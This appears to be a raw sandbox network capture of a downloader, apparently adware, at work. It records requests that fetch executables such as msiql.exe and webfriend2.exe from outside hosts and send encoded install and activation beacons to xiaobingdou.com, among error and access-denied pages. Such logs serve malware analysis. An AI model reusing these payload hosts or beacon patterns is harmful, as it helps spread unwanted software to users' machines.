X-Frame-Options: SAMEORIGIN
Server: cloudflare-nginx
CF-RAY: 38f525f470288ac8-KBP
ce3
<!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
<!--[if IE 7]>    <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
<!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
<head>
<title>Access denied | down.yeadesktop.com used Cloudflare to restrict access</title>
<meta charset="UTF-8" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />
<meta name="robots" content="noindex, nofollow" />
<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1" />
<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />
<!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->
<style type="text/css">body{margin:0;padding:0}</style>
<!--[if lte IE 9]><script type="text/javascript" src="/cdn-cgi/scripts/jquery.min.js"></script><![endif]

<<< skipped >>>

GET /offer/msiql.exe HTTP/1.1
User-Agent: Agent336712
Host: down.yeadesktop.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Wed, 16 Aug 2017 14:40:20 GMT
Content-Type: application/octet-stream
Content-Length: 2072576
Connection: keep-alive
Set-Cookie: __cfduid=d925b57e7ca3561034abea56a5bcf1b0a1502894419; expires=Thu, 16-Aug-18 14:40:19 GMT; path=/; domain=.yeadesktop.com; HttpOnly
Last-Modified: Wed, 10 May 2017 03:19:50 GMT
Accept-Ranges: bytes
ETag: "3072ec483cc9d21:0"
Server: cloudflare-nginx
CF-RAY: 38f525ebb64883f4-KBP

<<< skipped >>>

GET /offer/service.exe HTTP/1.1
User-Agent: Agent347835
Host: down.yeadesktop.com
Cache-Control: no-cache
Cookie: __cfduid=d5306f411be5b94d33d9913bbc141529d1502894419


HTTP/1.1 404 Not Found
Date: Wed, 16 Aug 2017 14:40:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Server: cloudflare-nginx
CF-RAY: 38f5262fb17483f4-KBP
48b
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://VVV.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312"/>
<title>404 - ..................</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>..........</h1></div>
<div id="content">
 <div class="content-container"><fieldset>
  <h2>404 - ..................</h2>
  <h3>......................................................</h3>
 </fieldset></div>
</div>
</body>
</html>
0


GET /get.aspx?url=hXXp://qtipr.com/ HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:34 GMT
Connection: close
Content-Length: 3030

<<< skipped >>>

GET /get.aspx?url=hXXp://yeadesktopbr.com/ HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:35 GMT
Connection: close
Content-Length: 3030

<<< skipped >>>

GET /jihuo.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ3RDA0Q0U4N0I5Nzg0QUQyQTk3RTc2N0RDRThDRkY1ODUyM0QwODA1RTU4N0M3NzE4OUFFQTE1RDdDN0JGRTFBQjAyOEM3NTUxNkJCNzU1RDEzRjUzNzg5QkRFRTBBOThEMzlDQTZGRDYyNzA1MzI0RjIwNThCQTJFRkY3NDY2NjM1MTBDMUQxQ0Q0NUZFRDREQ0U5M0Y4MzZDMzhCM0Ez HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: xiaobingdou.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:26 GMT
Connection: close
Content-Length: 0


GET /offer/msiql.exe HTTP/1.1
Accept: */*
User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: down.yeadesktop.com
Cookie: __cfduid=d5306f411be5b94d33d9913bbc141529d1502894419


HTTP/1.1 403 Forbidden
Date: Wed, 16 Aug 2017 14:40:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=10
Expires: Wed, 16 Aug 2017 14:40:30 GMT
X-Frame-Options: SAMEORIGIN
Server: cloudflare-nginx
CF-RAY: 38f525efc70783f4-KBP

<<< skipped >>>

GET /get.aspx?url=hXXp://VVV.yeadesktop.com/ HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:28 GMT
Connection: close
Content-Length: 3030

<<< skipped >>>

GET /20002.exe HTTP/1.1
Accept: */*
User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dl-o.1haitao.com


HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/x-msdownload
Content-Length: 1339016
Connection: keep-alive
Date: Wed, 16 Aug 2017 14:05:07 GMT
x-oss-request-id: 59945113F4D4EC5D03C6CFF9
Accept-Ranges: bytes
ETag: "680D0B8CE81A562A0C5D5BD98FCA3B04"
Last-Modified: Tue, 08 Aug 2017 06:29:07 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 2922808158989109942
x-oss-storage-class: Standard
Content-MD5: aA0LjOgaVioMXVvZj8o7BA==
x-oss-server-time: 1
Via: cache34.l2de1[459,304-0,H], cache35.l2de1[2796,0], cache3.de1[0,200-0,H], cache4.de1[0,0]
Age: 2126
X-Cache: HIT TCP_MEM_HIT dirn:0:761339685
X-Swift-SaveTime: Wed, 16 Aug 2017 14:05:07 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: c31b1fcc15028944335665385e

<<< skipped >>>

GET /reportInstallaa.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ3RDA0Q0U4N0I5Nzg0QUQyQTk3RTc2N0RDRThDRkY1OEE1MkIwNURFRjg2Nzc4RDI1NzIyRUNGMjM1MUZFMTM3MDhDNzg5MTZDNjhDRUVFNTg3NjVDMkZBMjVFNDU5NjU4MTZEMEYzOTY3MkZCNkE5NUMzOUNDNkQxNTE2M0Q5NTlEQzMyNDg4N0VGRUE3Q0FBNEM5NTNERTQwNjlDMjYxMzMyQTY1NzhBODFENzAzMDc0NDM2QzQ0OUQwODc0QTZCRDcwMjM0OTAyQzY3NTY0MzBCMjYxMDBGQUQ5QkU5MTM2OTMxM0M1N0JBMkI1QzQ3QjkxOUM5NzNFNTg1NDI0 HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: xiaobingdou.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:26 GMT
Connection: close
Content-Length: 0


GET /get.aspx?url=hXXp://VVV.yeadesktop.com/ HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:24 GMT
Connection: close
Content-Length: 3030

<<< skipped >>>

GET /get.aspx?url=hXXp://VVV.yeadesktop.com/ HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:25 GMT
Connection: close
Content-Length: 3030

<<< skipped >>>

GET /get.aspx?url=hXXp://qtipr.com/ HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:32 GMT
Connection: close
Content-Length: 3030

<<< skipped >>>

GET /get.aspx?url=hXXp://yeadesktopbr.com/ HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:38 GMT
Connection: close
Content-Length: 3030

<<< skipped >>>

GET /jihuo.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQxNUY5M0U4RTk1NUQ5RTc2RTMyNDUxOUQ5RkI5Nzg5MjIwRDc5QzBBNDM2NDk2ODgxRDAwQjczRjcxRjlFRkM3Nzg1NDlFMjY0RUI4MTg4NjBEQjVBODFGMTk0OUY1QTVBRTkyREQ1Njk0N0ZBNTA5MUVCNTFGNzJDRjkzNTYyMjhFQzc4RjJGRDE1NTg1MUYzRTBDQTlGNUZGOEM4MTkx HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: xiaobingdou.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:32 GMT
Connection: close
Content-Length: 0


GET /offer/msiql.exe HTTP/1.1
Accept: */*
User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: down.yeadesktop.com
Cookie: __cfduid=d5306f411be5b94d33d9913bbc141529d1502894419


HTTP/1.1 403 Forbidden
Date: Wed, 16 Aug 2017 14:40:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=10
Expires: Wed, 16 Aug 2017 14:40:30 GMT
X-Frame-Options: SAMEORIGIN
Server: cloudflare-nginx
CF-RAY: 38f525f091b08b1c-KBP

<<< skipped >>>

GET /offer/msiql.exe HTTP/1.1
Accept: */*
User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: down.yeadesktop.com
Cookie: __cfduid=d925b57e7ca3561034abea56a5bcf1b0a1502894419


HTTP/1.1 403 Forbidden
Date: Wed, 16 Aug 2017 14:40:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=10
Expires: Wed, 16 Aug 2017 14:40:30 GMT
X-Frame-Options: SAMEORIGIN
Server: cloudflare-nginx
CF-RAY: 38f525ee315c8b1c-KBP

<<< skipped >>>

GET /data/webfriend2.exe HTTP/1.1
Accept: */*
User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: quadratempbayinfo.com


HTTP/1.1 302 Found
Location: exefiles/webfriend1502893460.exe
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Date: Wed, 16 Aug 2017 14:41:10 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Connection: Keep-Alive


GET /data/webfriend2.exe HTTP/1.1
Accept: */*
User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: quadratempbayinfo.com


HTTP/1.1 302 Found
Location: exefiles/webfriend1502893460.exe
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Date: Wed, 16 Aug 2017 14:41:10 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Connection: Keep-Alive


GET /data/webfriend2.exe HTTP/1.1
Accept: */*
User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: quadratempbayinfo.com


HTTP/1.1 302 Found
Location: exefiles/webfriend1502893460.exe
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Date: Wed, 16 Aug 2017 14:41:10 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Connection: Keep-Alive


GET /data/webfriend2.exe HTTP/1.1
Accept: */*
User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: quadratempbayinfo.com


HTTP/1.1 302 Found
Location: exefiles/webfriend1502893460.exe
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Date: Wed, 16 Aug 2017 14:41:10 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Connection: Keep-Alive


GET /data/webfriend2.exe HTTP/1.1
Accept: */*
User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: quadratempbayinfo.com


HTTP/1.1 302 Found
Location: exefiles/webfriend1502893460.exe
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Date: Wed, 16 Aug 2017 14:41:10 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Connection: Keep-Alive


GET /data/webfriend2.exe HTTP/1.1
Accept: */*
User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: quadratempbayinfo.com


HTTP/1.1 302 Found
Location: exefiles/webfriend1502893460.exe
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Date: Wed, 16 Aug 2017 14:41:10 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Connection: Keep-Alive


GET /data/webfriend2.exe HTTP/1.1
Accept: */*
User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: quadratempbayinfo.com


HTTP/1.1 302 Found
Location: exefiles/webfriend1502893460.exe
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Date: Wed, 16 Aug 2017 14:41:10 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Connection: Keep-Alive


GET /data/webfriend2.exe HTTP/1.1
Accept: */*
User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: quadratempbayinfo.com


HTTP/1.1 302 Found
Location: exefiles/webfriend1502893460.exe
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Date: Wed, 16 Aug 2017 14:41:11 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Connection: Keep-Alive
....



GET /data/webfriend2.exe HTTP/1.1

Accept: */*
User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: quadratempbayinfo.com


HTTP/1.1 302 Found
Location: exefiles/webfriend1502893460.exe
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Date: Wed, 16 Aug 2017 14:41:11 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Connection: Keep-Alive
....



GET /data/webfriend2.exe HTTP/1.1

Accept: */*
User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: quadratempbayinfo.com


HTTP/1.1 302 Found
Location: exefiles/webfriend1502893460.exe
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Date: Wed, 16 Aug 2017 14:41:11 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Connection: Keep-Alive


GET /offer/msiql.exe HTTP/1.1
Accept: */*
User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: down.yeadesktop.com
Cookie: __cfduid=d5306f411be5b94d33d9913bbc141529d1502894419


HTTP/1.1 403 Forbidden
Date: Wed, 16 Aug 2017 14:40:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=10
Expires: Wed, 16 Aug 2017 14:40:30 GMT
X-Frame-Options: SAMEORIGIN
Server: cloudflare-nginx
CF-RAY: 38f525f216e58b52-KBP
ce3..<!DOCTYPE html>.<!--[if lt IE 7]> <html class="no-
js ie6 oldie" lang="en-US"> <![endif]-->.<!--[if IE 7]>
<html class="no-js ie7 oldie" lang="en-US"> <![endif]--&g
t;.<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-U
S"> <![endif]-->.<!--[if gt IE 8]><!--> <html
class="no-js" lang="en-US"> <!--<![endif]-->.<head>.
<title>Access denied | down.yeadesktop.com used Cloudflare to re
strict access</title>.<meta charset="UTF-8" />.<meta ht
tp-equiv="Content-Type" content="text/html; charset=UTF-8" />.<m
eta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<
meta name="robots" content="noindex, nofollow" />.<meta name="vi
ewport" content="width=device-width,initial-scale=1,maximum-scale=1" /
>.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/style
s/cf.errors.css" type="text/css" media="screen,projection" />.<!
--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href
="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,proj
ection" /><![endif]-->.<style type="text/css">body{marg
in:0;padding:0}</style>.<!--[if lte IE 9]><script type=
"text/javascript" src="/cdn-cgi/scripts/jquery.min.js"></script&
gt;<![endif]-->.<!--[if gte IE 10]><!--><script t
ype="text/javascript" src="/cdn-cgi/scripts/zepto.min.js"></scri
pt><!--<![endif]-->.<script type="text/javascript"

<<< skipped >>>

GET /get.aspx?url=hXXp://qtipr.com/ HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:32 GMT
Connection: close
Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>.. <style>.. body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} .. p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..
b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucid
a Console";font-size: .9em}.. .marker {font-weight: bold; colo
r: black;text-decoration: none;}.. .version {color: gray;}..
.error {margin-bottom: 10px;}.. .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..
</style>.. </head>.. <body bgcolor="white">.
. <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>.. <h2&
gt; <i>Runtime Error</i> </h2></span>..
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">.. <b> Description: </b>An application
error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
by browsers running on the local server machine... <

<<< skipped >>>

GET /js/geo2.js HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: cdn3.optimizely.com


HTTP/1.1 200 OK
Server: AmazonS3
Content-Length: 290
Content-Type: application/javascript
x-amz-id-2: gGAU2mEDtFFvD7ycmQ E V25vxWoHcSj5N37VNBlmtwFFNAgc4qEruHqt1etulj0 b833Mqb9Nw=
x-amz-version-id: Y1BKPK.c9lIaZx2uYj8JMWZye_vJfrh9
ETag: "adadfc5d7afd13e353d9d52cec1c7827"
x-amz-request-id: 0B414A2AB6ACE923
Cache-Control: max-age=82735
Date: Wed, 16 Aug 2017 14:40:17 GMT
Connection: close
(function(){.  window['optimizely'] = window['optimizely'] || [];.  wi
ndow['optimizely'].push(['activateGeoDelayedExperiments', {. 'locat
ion':{. 'city': "KHARKIV",. 'continent': "EU",. 'countr
y': "UA",. 'region': "". },. 'ip':"194.242.96.218". }]);.}
).//.()..;..


GET /offer/service.exe HTTP/1.1
User-Agent: Agent336712
Host: down.yeadesktop.com
Cache-Control: no-cache


HTTP/1.1 404 Not Found
Date: Wed, 16 Aug 2017 14:40:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d5306f411be5b94d33d9913bbc141529d1502894419; expires=Thu, 16-Aug-18 14:40:19 GMT; path=/; domain=.yeadesktop.com; HttpOnly
Server: cloudflare-nginx
CF-RAY: 38f525ebb5b3842a-KBP
48b..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http
://VVV.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="ht
tp://VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Co
ntent-Type" content="text/html; charset=gb2312"/>..<title>404
- ..................</title>..<style type="text/css">..&l
t;!--..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvet
ica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15p
x;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;mar
gin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#00
0000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-f
amily:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-colo
r:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-co
ntainer{background:#FFF;width:96%;margin-top:8px;padding:10px;position
:relative;}..-->..</style>..</head>..<body>..<
div id="header"><h1>..........</h1></div>..<di
v id="content">.. <div class="content-container"><fieldset
>.. <h2>404 - ..................</h2>.. <h3>...
...................................................</h3>.. </
fieldset></div>..</div>..</body>..</html>..
0..

<<< skipped >>>

GET /reportInstallaa.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ3RDA0Q0U4N0I5Nzg0QUQyQTk3RTc2N0RDRThDRkY1OEE1MkIwNURFRjg2Nzc4RDI1NzIyRUNGMjM1MUZFMTM3MDhDNzg5MTZDNjhDRUVFNTg3NjVDMkZBMjVFNDU5NjU4MTZEMEYzOTY3MkZCNkE5NUMzOUNDNkQxNTE2M0Q5NUFDNTZFRUJDNEUyNTQzODNFODA2QjQ0RkMwRUE0RDE2RkM1N0Q0RjQzQ0FFQkZEN0YxRDM3QUVCMTIzMDkzODM1MUVGRjlEMEU1MTMwMzQ5OUZBMTFGQkQ1MDQ2NUU3QjQ1QjE3RTBFQjAxOTJBRkZDOEYzQ0IwQjZBRkQyQURB HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: xiaobingdou.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:28 GMT
Connection: close
Content-Length: 0


GET /upgrade/9001.xml HTTP/1.1
Accept: */*
User-Agent: Agent339723
Host: config.yeadesktop.com
Cache-Control: no-cache
Cookie: __cfduid=d5306f411be5b94d33d9913bbc141529d1502894419


HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 27 Apr 2017 07:00:09 GMT
Accept-Ranges: bytes
ETag: "556fbfe823bfd21:0"
Server: Microsoft-IIS/7.5
Date: Wed, 16 Aug 2017 14:40:19 GMT
Content-Length: 173
#ws...................................................................
......................................................................
.................................HTTP/1.1 200 OK..Content-Type: text/x
ml..Last-Modified: Thu, 27 Apr 2017 07:00:09 GMT..Accept-Ranges: bytes
..ETag: "556fbfe823bfd21:0"..Server: Microsoft-IIS/7.5..Date: Wed, 16
Aug 2017 14:40:19 GMT..Content-Length: 173..#ws.......................
......................................................................
......................................................................
.........


GET /offer/msiql.exe HTTP/1.1
Accept: */*
User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: down.yeadesktop.com
Cookie: __cfduid=d5306f411be5b94d33d9913bbc141529d1502894419


HTTP/1.1 403 Forbidden
Date: Wed, 16 Aug 2017 14:40:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=10
Expires: Wed, 16 Aug 2017 14:40:30 GMT
X-Frame-Options: SAMEORIGIN
Server: cloudflare-nginx
CF-RAY: 38f525f2e1fc8b1c-KBP
ce3..<!DOCTYPE html>.<!--[if lt IE 7]> <html class="no-
js ie6 oldie" lang="en-US"> <![endif]-->.<!--[if IE 7]>
<html class="no-js ie7 oldie" lang="en-US"> <![endif]--&g
t;.<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-U
S"> <![endif]-->.<!--[if gt IE 8]><!--> <html
class="no-js" lang="en-US"> <!--<![endif]-->.<head>.
<title>Access denied | down.yeadesktop.com used Cloudflare to re
strict access</title>.<meta charset="UTF-8" />.<meta ht
tp-equiv="Content-Type" content="text/html; charset=UTF-8" />.<m
eta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<
meta name="robots" content="noindex, nofollow" />.<meta name="vi
ewport" content="width=device-width,initial-scale=1,maximum-scale=1" /
>.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/style
s/cf.errors.css" type="text/css" media="screen,projection" />.<!
--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href
="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,proj
ection" /><![endif]-->.<style type="text/css">body{marg
in:0;padding:0}</style>.<!--[if lte IE 9]><script type=
"text/javascript" src="/cdn-cgi/scripts/jquery.min.js"></script&
gt;<![endif]-->.<!--[if gte IE 10]><!--><script t
